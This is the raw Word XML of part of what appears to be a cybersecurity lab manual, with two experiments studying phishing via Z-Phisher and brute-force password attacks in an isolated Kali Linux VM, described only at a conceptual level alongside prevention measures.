          </w:tcPr>
          <w:p w14:paraId="6E9D9FD8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00A0A38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C36DDCA" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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5B10846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8B0406B" w14:textId="70D596F8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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">AIM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>To study phishing attack concepts using the Z-Phisher open-source framework in Kali Linux in order to understand social-engineering threats, user behavior exploitation, and preventive security measures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C804581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5CA420FC" w14:textId="47DB7606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SOFTWARE REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9254C4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Host Operating System: Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCAA849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Virtualization Software: Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A6E47E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Guest Operating System: Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759885C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Study Tool: Z-Phisher (Open-Source GitHub Framework – Educational Use)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751BCA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System Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BF088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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7870C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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C4CD4D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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76082B54" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="720B7748" w14:textId="083FACD6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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEBFFE4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1: Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C495A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Open Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF3BD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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11972B61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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A1E6BA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6F67E946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2: Study the Z-Phisher Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006D15C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Visit the Z-Phisher GitHub repository (read-only study).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E808D7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Review documentation to understand:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A812C0" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Types of phishing templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E40B51" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Social-engineering techniques used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48930BC6" w14:textId="77777777" w:rsid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Ethical usage warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CA04F6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4C3793C1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3: Understand Phishing Attack Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2C316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Analyze how fake login pages mimic legitimate websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396EF6A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Observe how users are tricked into entering credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FA6400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Study the role of URL masking and trust exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9E49F5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50DB3854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4: Controlled Demonstration (Simulation Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050CD0C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Perform a local, consent-based simulation using dummy accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B10E3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Observe how phishing pages appear to users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7C5F14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Analyze user response behavior (no real credentials used).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246E4E30" w14:textId="36BA3A64" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C66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585416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lastRenderedPageBreak/>
        <w:t>Step 5: Identify Security Risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9EB752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Credential theft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EB8AC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Identity compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01379A7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Financial fraud</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2C5942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Privacy violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E34AB5D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3969170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6: Study Prevention Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA4B1D3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User awareness and phishing education</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46961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Browser security warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF7B64E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Two-factor authentication (2FA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C19CE04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Email and URL filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550136B5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HTTPS and domain verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FECAA27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2A9CB3FE" w14:textId="437A23C5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OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B1E2E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Clear understanding of phishing techniques and attack flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B598FC8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Identification of social-engineering risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EDAE6A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Screenshots and notes recorded for academic reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1A805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082C1BE3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0A1D1AA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2436A5D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EBB183F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BCCE061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9BCEA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19F0757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03E849F3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D19D1D6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D2DA62A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A538C85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092305C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68AC545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9AFB9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7930C43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D0876E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3E77F756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B6B3628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33A61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1C8CB268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281B53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3A4912A4" w14:textId="05116E5A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RESULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205CFA6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The study of phishing attacks using the Z-Phisher framework was successfully completed in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C26D93" w14:textId="680A5011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This experiment improved understanding of social-engineering threats and emphasized the importance of user awareness and defensive security practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F36ED6" w14:textId="1F27216F" w:rsidR="00C6689C" w:rsidRDefault="00C6689C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54967D5D" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="1D47ACBE" w14:textId="611D2658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 14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="61BAC14C" w14:textId="279E3891" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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AND DEMONSTRATION OF BRUTE FORCE PASSWORD ATTACK IN A CONTROLLED KALI LINUX ENVIRONMENT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C6689C" w14:paraId="0E20758A" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C54432F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7A23937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579D655" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="0090255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E49EFE0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DD932C6" w14:textId="7F205062" w:rsidR="00C6689C" w:rsidRDefault="00C6689C" w:rsidP="00C6689C">
      <w:p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AIM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>To study and demonstrate the concept of brute force password attacks in a controlled Kali Linux environment to understand password vulnerabilities and the importance of strong authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77CA0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</w:p>
    <w:p w14:paraId="107DCDAB" w14:textId="5E67B7AF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SOFTWARE REQUIREMENTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4547D6C9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Host Operating System:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows / Linux / macOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7007C9AA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Virtualization Software:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Oracle VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D06721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Guest Operating System:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57115E3D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Study Tools:</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Open-source password auditing utilities (educational use only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505930BC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System Requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AF8FB1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RAM: Minimum 4 GB (8 GB recommended)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52282249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Disk Space: Minimum 30 GB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B83211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Processor: Intel/AMD with Virtualization support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C18385" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="618F2680" w14:textId="4A8DB765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PROCEDURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC4F655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1: Start Kali Linux Virtual Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2B020E" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Open Oracle VirtualBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FAB17F" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Start Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567829E1" w14:textId="77777777" w:rsid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Log in using Kali credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4674FD29" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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5AEB8749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2: Set Up a Controlled Test Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B1E09A" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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 xml:space="preserve">Use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>locally created test account</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>dummy authentication service</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0228B1" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Ensure no real systems or credentials are involved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE009B6" w14:textId="77777777" w:rsid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Confirm the environment is isolated from external networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E537C5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59E144E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3: Study Brute Force Attack Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321C9407" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Understand how login mechanisms validate credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D67A909" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> how attackers automate repeated login attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCC859A" w14:textId="77777777" w:rsid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Observe how password complexity affects attack feasibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67764D3D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2D2E3BCA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4: Educational Demonstration (Simulation Only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B87BDD" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Simulate repeated authentication attempts using dummy data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D74B20F" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Observe system responses such as delays or access denial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFF56B" w14:textId="77777777" w:rsid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Record observations without executing real attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65975ACD" w14:textId="7A835C23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2AD6C90A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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Weaknesses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB3CD5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Weak or short passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37897F33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No rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1921F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Missing account lockout policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AF6F19" w14:textId="77777777" w:rsid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Lack of multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737BC8EA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5D4608FE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6: Study Prevention and Mitigation Techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D3DC3A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Strong password policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B482BF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Account lockout and rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C08C5E2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CAPTCHA mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079C498B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Multi-factor authentication (MFA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BE1631" w14:textId="77777777" w:rsid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Monitoring and alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C6CB80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480C18D4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7FFFAD62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662A92E4" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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44660E39" w14:textId="4DA83775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OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3C71EF" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Understanding of brute force attack concepts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB8D68" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRP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Identification of password-related security risks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C8F5F" w14:textId="77777777" w:rsid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Screenshots and notes recorded for academic reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B960A71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CD93AF8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400711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C987BFA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71645616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0E0CE16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F651475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59A8117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786D87C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80CEBC8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85D85B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768C9EFC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D5DF3B4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943C407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B8238C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6C808914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BC7ED8E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D4223FD" w14:textId="77777777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F34F905" w14:textId="1E0A5D3C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RESULT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E41EF90" w14:textId="77777777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The study and demonstration of brute force password attacks were successfully completed in a controlled Kali Linux environment.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C6689C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
        <w:t>The experiment emphasized the importance of strong passwords and robust authentication mechanisms to prevent unauthorized access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48987EDC" w14:textId="77777777" w:rsidR="00C6689C" w:rsidRPr="00C6689C" w:rsidRDefault="00C6689C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C6689C" w:rsidRPr="00C6689C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53A0E" w14:textId="77777777" w:rsidR="006F5CD6" w:rsidRDefault="006F5CD6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="30F2D02F" w14:textId="77777777" w:rsidR="006F5CD6" w:rsidRDefault="006F5C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79029D71-030E-4D33-9372-35CB907BB51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2B75D6-A1D2-4BC2-8247-00248B56A5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576FAA-21B3-47B8-AC5E-62578D26DF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51BB" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF7625">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:jc w:val="center"/>
    </w:pPr>
  </w:p>
  <w:p w14:paraId="68565550" w14:textId="77777777" w:rsidR="00EF7625" w:rsidRDefault="00EF76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5450" w14:textId="77777777" w:rsidR="006F5CD6" w:rsidRDefault="006F5CD6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="403DE03E" w14:textId="77777777" w:rsidR="006F5CD6" w:rsidRDefault="006F5C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4556" w14:textId="77777777" w:rsidR="00F44251" w:rsidRDefault="00F442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52CAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAB4F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67521"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="799607E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CC36B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="154E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3B60C8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48CE8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1F1EE7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="54408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A5782"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B560B81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C298A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AE2E8B7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839DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D243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C1433D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8DC2AF6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416A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C5583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9E2E7C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F2B83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1620"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20107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4D2881"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C96E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455442"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6950BBC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66AC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F4503B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F4E7EEC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F04C5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FF4B1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D930C22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F567A5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05DAB80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E1E4717"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EC8A1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54679D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78445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BF1ABE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4C441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129058">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="223689537">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="399982152">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="815680614">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1326275124">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1322611773">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="84032859">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1646473891">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="87697649">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="121922577">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="633215939">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1035156307">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="151607733">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="669257478">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1264071367">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1190995574">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1810391821">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="557205729">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1805733148">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1616475819">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1773816102">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="547110966">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="10249450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842743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27528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187714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01098738">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="829561710">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="16599160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251"/>
    <w:rsid w:val="000F4FFB"/>
    <w:rsid w:val="001F7817"/>
    <w:rsid w:val="003D6D0E"/>
    <w:rsid w:val="004A46D5"/>
    <w:rsid w:val="004D6A09"/>
    <w:rsid w:val="005025F0"/>
    <w:rsid w:val="006F5CD6"/>
    <w:rsid w:val="00835F24"/>
    <w:rsid w:val="00B3004F"/>
    <w:rsid w:val="00C6689C"/>
    <w:rsid w:val="00CA22D0"/>
    <w:rsid w:val="00CE2C37"/>
    <w:rsid w:val="00EF7625"/>
    <w:rsid w:val="00F4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FD76"/>
  <w15:docId w15:val="{2FD8E7FE-4CA9-45B6-BD28-FE090A70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89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6689C"/>
    <w:rPr>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00EF762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F7625"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="936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F7625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E71C5-2151-4695-B498-D42EFEA08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45</Pages>
  <Words>4213</Words>
  <Characters>24015</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>200</Lines>
  <Paragraphs>56</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>28172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Namith</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-08T09:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-10T16:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>